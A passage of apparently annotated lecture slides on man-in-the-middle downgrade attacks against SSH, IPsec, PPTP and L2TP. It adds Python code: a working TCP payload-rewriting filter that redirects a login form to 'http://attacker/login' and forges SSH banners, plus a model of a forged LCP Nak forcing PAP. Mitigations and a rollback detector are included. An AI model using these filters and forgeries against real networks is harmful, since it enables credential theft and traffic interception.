- The attacker can force the client to initialize an SSH1 connection instead of SSH2.
- The server announces what it supports in its version banner:
  SSH-1.99 -- the server supports ssh1 and ssh2
  SSH-1.51 -- the server supports ONLY ssh1
- The attacker makes a filter that replaces "1.99" with "1.51" in the server banner. The replacement has the same length, so no sequence-number adjustment is needed.
- Possibility to circumvent known_hosts: the SSH1 host key is a different key from the SSH2 one and is stored under a different key type, so a client that has only the server's SSH2 key cached gets a "new host" prompt instead of a changed-key warning.
- The downgrade only works if the client is willing to fall back to protocol 1; a client configured for protocol 2 only (Protocol 2 in the OpenSSH client configuration) refuses the 1.51 banner and the connection fails instead.
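As an added example (not code from the slides or from any tool they describe), the following Python filter implements the mechanism behind pages 54, 56 and 58 in one place: it rewrites bytes in a TCP payload, recomputes the IP and TCP checksums, and keeps seq/ack consistent in both directions when the replacement changes the payload length (the form rewrite grows the payload by one byte; the SSH banner rewrite does not). Packets are built in memory so it runs offline; the addresses, ports, page content and the host names server and attacker are constructed for the demo.

```python
import struct

# Added example, not code from the slides: a minimal full-duplex TCP payload filter.
# Packets are constructed here so the demo runs offline; hosts and content are made up.


def checksum(data: bytes) -> int:
    """RFC 1071 one's-complement checksum over 16-bit words (pad odd length with 0)."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_packet(src, dst, sport, dport, seq, ack, payload: bytes) -> bytes:
    """IPv4/TCP packet (PSH+ACK, no options) with correct IP and TCP checksums."""
    tcp = struct.pack("!HHIIBBHHH", sport, dport, seq, ack, 5 << 4, 0x18, 65535, 0, 0) + payload
    pseudo = src + dst + struct.pack("!BBH", 0, 6, len(tcp))
    tcp = tcp[:16] + struct.pack("!H", checksum(pseudo + tcp)) + tcp[18:]
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0, 0, 64, 6, 0, src, dst)
    ip = ip[:10] + struct.pack("!H", checksum(ip)) + ip[12:]
    return ip + tcp


def parse_packet(pkt: bytes):
    """Return (src, dst, sport, dport, seq, ack, payload) of an IPv4/TCP packet."""
    ihl = (pkt[0] & 0x0F) * 4
    src, dst = pkt[12:16], pkt[16:20]
    sport, dport, seq, ack, off = struct.unpack("!HHIIB", pkt[ihl:ihl + 13])
    thl = (off >> 4) * 4
    return src, dst, sport, dport, seq, ack, pkt[ihl + thl:]


def checksums_valid(pkt: bytes) -> bool:
    """The receiver's view: IP header and TCP (with pseudo-header) must both sum to zero."""
    ihl = (pkt[0] & 0x0F) * 4
    tcp = pkt[ihl:]
    pseudo = pkt[12:16] + pkt[16:20] + struct.pack("!BBH", 0, 6, len(tcp))
    return checksum(pkt[:ihl]) == 0 and checksum(pseudo + tcp) == 0


class StreamFilter:
    """Byte-replacement rules on TCP payloads, with seq/ack bookkeeping per direction.

    delta[direction] = bytes the filter has added (negative: removed) in that direction so
    far. Later segments in that direction get seq shifted by it; acknowledgements coming
    back the other way get ack shifted by the same amount, so neither end notices.
    """

    def __init__(self, rules):
        self.rules = rules          # list of (needle, replacement) byte strings
        self.delta = {}

    def process(self, pkt: bytes) -> bytes:
        src, dst, sport, dport, seq, ack, payload = parse_packet(pkt)
        fwd, rev = (src, sport, dst, dport), (dst, dport, src, sport)
        seq = (seq + self.delta.get(fwd, 0)) & 0xFFFFFFFF
        ack = (ack - self.delta.get(rev, 0)) & 0xFFFFFFFF
        new_payload = payload
        for needle, repl in self.rules:
            new_payload = new_payload.replace(needle, repl)
        self.delta[fwd] = self.delta.get(fwd, 0) + len(new_payload) - len(payload)
        return build_packet(src, dst, sport, dport, seq, ack, new_payload)


SERVER, CLIENT = bytes([10, 0, 0, 2]), bytes([10, 0, 0, 5])     # constructed addresses

RULES = [
    # page 56: send the login form to the attacker (one byte longer than the original)
    (b'action="https://server/login"', b'action="http://attacker/login"'),
    # page 58: make an ssh1+ssh2 server look ssh1-only (same length, no seq fix-up needed)
    (b"SSH-1.99", b"SSH-1.51"),
]


def run_demo():
    f = StreamFilter(RULES)
    page = b'HTTP/1.0 200 OK\r\n\r\n<form action="https://server/login" method="POST">'
    # server -> client: the page is rewritten in transit
    out1 = f.process(build_packet(SERVER, CLIENT, 80, 40000, 1000, 5000, page))
    pay1 = parse_packet(out1)[6]
    # client -> server: the client acks what it actually received (one byte more than sent)
    out2 = f.process(build_packet(CLIENT, SERVER, 40000, 80, 5000, 1000 + len(pay1), b""))
    # server -> client: the next segment starts at the server's own sequence number
    out3 = f.process(build_packet(SERVER, CLIENT, 80, 40000, 1000 + len(page), 5000, b"</form>"))
    # a separate SSH connection: only the banner is touched
    out4 = f.process(build_packet(SERVER, CLIENT, 22, 40001, 7000, 9000, b"SSH-1.99-OpenSSH_3.7\r\n"))
    return {
        "form_action": pay1,
        "ack_seen_by_server": parse_packet(out2)[5],      # 1069 = 1000 + len(page)
        "seq_seen_by_client": parse_packet(out3)[4],      # 1070 = server seq + 1 byte added
        "ssh_banner": parse_packet(out4)[6],
        "all_checksums_ok": all(checksums_valid(p) for p in (out1, out2, out3, out4)),
    }
```

The filter works per packet; a needle split across two segments is missed, which is the usual limitation of simple in-line filters and why real implementations reassemble the stream before matching. Note also that the length change only stays invisible because both directions pass through the filter.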

Page 59: Downgrade attack examples: IPSEC failure

- Block the key material exchanged on port 500 UDP (the IKE/ISAKMP exchange), so no security association is ever set up.
- Each end point concludes that the other cannot start an IPSEC connection.
- If the client is configured in rollback mode (IPsec preferred, clear text allowed when negotiation fails), there is a good chance that the user will not notice that the connection is in clear text. A policy that requires IPsec fails closed instead, which turns the attack into a visible outage.

Page 60: Downgrade attack examples: PPTP attack (1)

During the negotiation phase:
- Force PAP authentication (usually fails)
- Force MS-CHAPv1 instead of MS-CHAPv2 (easier to crack)
- Force no encryption

Force re-negotiation (LCP control frames such as Terminate-Ack are not protected, so an injected one tears the link down in clear text and restarts negotiation):
- Retrieve passwords from existing tunnels
- Perform the previous attacks

Force a "password change" to obtain password hashes:
- The hashes can be used directly by a modified SMB or PPTP client
- MS-CHAPv2 hashes are not useful for this (but you can force v1)

Page 61: Downgrade attack examples: PPTP attack (2)

Force PAP from CHAP. The LCP authentication-protocol option is negotiated with Configure-Request / Configure-Nak / Configure-Ack messages between Server and Client; the MITM answers the server in the client's place:

Server -> Client:  Configure-Request [auth = CHAP]   (intercepted by the MITM)
MITM   -> Server:  Configure-Nak     [auth = PAP]    (forged, as if from the client)
Server -> Client:  Configure-Request [auth = PAP]    (passed through)
Client -> Server:  Configure-Ack     [auth = PAP]    (passed through)

From here on the client authenticates with PAP and the password crosses the tunnel in clear text.

We don't have to mess with GRE sequences...
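As an added example (not code from the slides or from any PPP implementation), this Python model encodes the LCP Configure-Request / Nak / Ack exchange above, lets an attacker forge the Nak that steers the server to PAP (or to MS-CHAPv1, the other downgrade listed on page 60), and shows the client-side policy that makes the downgrade fail instead of succeed. Frame layout follows RFC 1661 and the protocol numbers are the standard ones (0xC023 PAP, 0xC223 CHAP, algorithm 0x80 MS-CHAPv1 and 0x81 MS-CHAPv2); the peers, identifiers, preference list and the `refuse` policy names are made up for the demo.

```python
import struct

# Added example, not code from the slides: LCP option-3 negotiation with a forged
# Configure-Nak, plus the client policy that refuses the downgrade. Peers and
# preferences are constructed for the demo.

CONF_REQ, CONF_ACK, CONF_NAK = 1, 2, 3      # LCP codes
OPT_AUTH = 3                                # Authentication-Protocol option
PAP, CHAP = 0xC023, 0xC223
MSCHAP_V1, MSCHAP_V2 = 0x80, 0x81           # CHAP algorithm byte


def auth_option(proto, algo=None) -> bytes:
    """Encode option 3: PAP has no algorithm byte, CHAP carries one."""
    if proto == PAP:
        return struct.pack("!BBH", OPT_AUTH, 4, PAP)
    return struct.pack("!BBHB", OPT_AUTH, 5, CHAP, algo)


def lcp(code, ident, options) -> bytes:
    """LCP packet: code, identifier, length, then the option list."""
    body = b"".join(options)
    return struct.pack("!BBH", code, ident, 4 + len(body)) + body


def parse_lcp(pkt: bytes):
    code, ident, length = struct.unpack("!BBH", pkt[:4])
    opts, i = {}, 4
    while i < length:
        t, l = pkt[i], pkt[i + 1]
        opts[t] = pkt[i + 2:i + l]
        i += l
    return code, ident, opts


def auth_of(opts):
    """(protocol, algorithm-or-None) from option 3, or None if the option is absent."""
    raw = opts.get(OPT_AUTH)
    if raw is None:
        return None
    proto = struct.unpack("!H", raw[:2])[0]
    return (proto, raw[2] if len(raw) > 2 else None)


class Client:
    """PPP client policy: `refuse` holds (proto, algo) pairs it Naks (the equivalent of
    pppd's refuse-pap / refuse-mschap); it always counter-proposes MS-CHAPv2."""

    def __init__(self, refuse=()):
        self.refuse = set(refuse)

    def answer(self, req: bytes) -> bytes:
        code, ident, opts = parse_lcp(req)
        if auth_of(opts) in self.refuse:
            return lcp(CONF_NAK, ident, [auth_option(CHAP, MSCHAP_V2)])
        return lcp(CONF_ACK, ident, [req[4:]])          # Ack echoes the accepted options


def make_mitm(target):
    """Attacker in the path: answer the server with a forged Nak (as if from the client)
    until the server offers `target`; only then let the client's real answer through."""
    def mitm(req: bytes, client: Client) -> bytes:
        code, ident, opts = parse_lcp(req)
        if auth_of(opts) != target:
            return lcp(CONF_NAK, ident, [auth_option(*target)])   # client never sees this request
        return client.answer(req)
    return mitm


def negotiate(server_prefs, client, mitm=None, max_rounds=4):
    """Run the option-3 negotiation; return the agreed (proto, algo), or None on failure."""
    offer, ident = server_prefs[0], 1
    for _ in range(max_rounds):
        req = lcp(CONF_REQ, ident, [auth_option(*offer)])
        reply = mitm(req, client) if mitm else client.answer(req)
        code, _, opts = parse_lcp(reply)
        if code == CONF_ACK:
            return offer
        suggested = auth_of(opts)              # Configure-Nak: the peer's counter-proposal
        if suggested not in server_prefs:
            return None
        offer, ident = suggested, ident + 1
    return None                                # no agreement: the link stays down (fails closed)


SERVER_PREFS = [(CHAP, MSCHAP_V2), (CHAP, MSCHAP_V1), (PAP, None)]   # constructed server policy


def run_scenarios():
    permissive = Client()
    hardened = Client(refuse={(PAP, None), (CHAP, MSCHAP_V1)})
    return {
        "no_mitm": negotiate(SERVER_PREFS, permissive),                                   # MS-CHAPv2
        "force_pap": negotiate(SERVER_PREFS, permissive, make_mitm((PAP, None))),         # PAP
        "force_mschap_v1": negotiate(SERVER_PREFS, permissive, make_mitm((CHAP, MSCHAP_V1))),
        "force_pap_hardened": negotiate(SERVER_PREFS, hardened, make_mitm((PAP, None))),  # None
    }
```

The hardened client never agrees to PAP: the server keeps re-offering what the forged Nak asked for, the client keeps refusing, and the link simply does not come up. That is the right failure mode for a downgrade attempt, and it is why the server side should also be configured to offer only the strongest method rather than a preference list that includes PAP.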

Page 62: Downgrade attack examples: L2TP rollback

- L2TP can use IPSec ESP as its transport layer (stronger than PPTP).
- By default L2TP is tried before PPTP.
- Blocking the ISAKMP packets (UDP port 500) results in an IPSec failure.
- The client then starts a request for a PPTP tunnel (rollback).
- Now the previous PPTP attacks can be performed. The rollback only happens because the client is allowed to fall back; a client restricted to L2TP/IPsec simply fails to connect.
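Both the IPsec failure on page 59 and the L2TP rollback on page 62 leave the same footprint on the wire: a client sends IKE to UDP/500, gets no answer, and shortly afterwards talks to the same peer without IPsec (TCP/1723 for a PPTP rollback, or the application traffic itself in clear). As an added example (not from the slides, and not any product's rule), the Python below runs that detection over a handful of constructed flow records; the addresses, timestamps, the 60-second window and the record format are assumptions for the demo.

```python
# Added example, not code from the slides: flag VPN clients that fell back to clear
# text or to PPTP after their IKE (UDP/500) attempts went unanswered.
# Flow records are constructed; on a real sensor they would come from NetFlow or pcap,
# with "replied" derived from the presence of a reverse flow.

FLOWS = [
    # host A: IKE blocked by the MITM, then a PPTP control channel to the same gateway (page 62)
    {"ts": 0,   "src": "10.0.0.5", "dst": "203.0.113.1", "proto": "udp", "dport": 500,  "replied": False},
    {"ts": 3,   "src": "10.0.0.5", "dst": "203.0.113.1", "proto": "udp", "dport": 500,  "replied": False},
    {"ts": 31,  "src": "10.0.0.5", "dst": "203.0.113.1", "proto": "tcp", "dport": 1723, "replied": True},
    # host B: IKE succeeds and ESP follows, then the application traffic: normal
    {"ts": 5,   "src": "10.0.0.6", "dst": "203.0.113.1", "proto": "udp", "dport": 500,  "replied": True},
    {"ts": 6,   "src": "10.0.0.6", "dst": "203.0.113.1", "proto": "esp", "dport": None, "replied": True},
    {"ts": 7,   "src": "10.0.0.6", "dst": "203.0.113.1", "proto": "tcp", "dport": 445,  "replied": True},
    # host C: IKE blocked, transport-mode policy in rollback mode goes to clear text (page 59)
    {"ts": 10,  "src": "10.0.0.7", "dst": "10.0.0.20",   "proto": "udp", "dport": 500,  "replied": False},
    {"ts": 12,  "src": "10.0.0.7", "dst": "10.0.0.20",   "proto": "tcp", "dport": 445,  "replied": True},
    # host D: IKE blocked but nothing else inside the window: an outage, not a rollback
    {"ts": 20,  "src": "10.0.0.8", "dst": "203.0.113.1", "proto": "udp", "dport": 500,  "replied": False},
    {"ts": 200, "src": "10.0.0.8", "dst": "203.0.113.1", "proto": "tcp", "dport": 443,  "replied": True},
]


def classify(flow):
    """Name the kind of unprotected traffic that followed the failed IKE exchange."""
    if flow["proto"] == "tcp" and flow["dport"] == 1723:
        return "pptp_rollback"          # L2TP/IPsec client fell back to PPTP
    if flow["proto"] == "udp" and flow["dport"] == 1701:
        return "l2tp_without_ipsec"     # L2TP tunnel with no ESP underneath
    return "cleartext_fallback"         # application traffic sent unprotected


def detect_rollback(flows, window=60):
    """Return one alert per (client, peer) whose IKE attempts were unanswered and who then
    sent non-IPsec traffic to that peer within `window` seconds."""
    pending = {}        # (src, dst) -> ts of the first unanswered IKE attempt
    alerts = []
    for f in sorted(flows, key=lambda f: f["ts"]):
        key = (f["src"], f["dst"])
        if f["proto"] == "udp" and f["dport"] == 500:
            if f["replied"]:
                pending.pop(key, None)          # IKE answered: nothing to flag
            else:
                pending.setdefault(key, f["ts"])  # keep the time of the first attempt
            continue
        if f["proto"] == "esp":
            pending.pop(key, None)              # ESP means the SA came up after all
            continue
        t0 = pending.get(key)
        if t0 is not None and f["ts"] - t0 <= window:
            alerts.append({"client": f["src"], "peer": f["dst"],
                           "kind": classify(f), "after_s": f["ts"] - t0})
            pending.pop(key)                    # one alert per fallback episode
    return alerts


if __name__ == "__main__":
    for a in detect_rollback(FLOWS):
        print("%(client)s -> %(peer)s: %(kind)s %(after_s)ds after IKE went unanswered" % a)
```

The window is the tuning knob: too short and a slow client's fallback is missed, too long and an unrelated connection to the same peer is flagged. Whatever the value, the alert is only a symptom; the fix is on the client, where the VPN profile must require IPsec (or L2TP/IPsec) with no fallback to clear text or to PPTP.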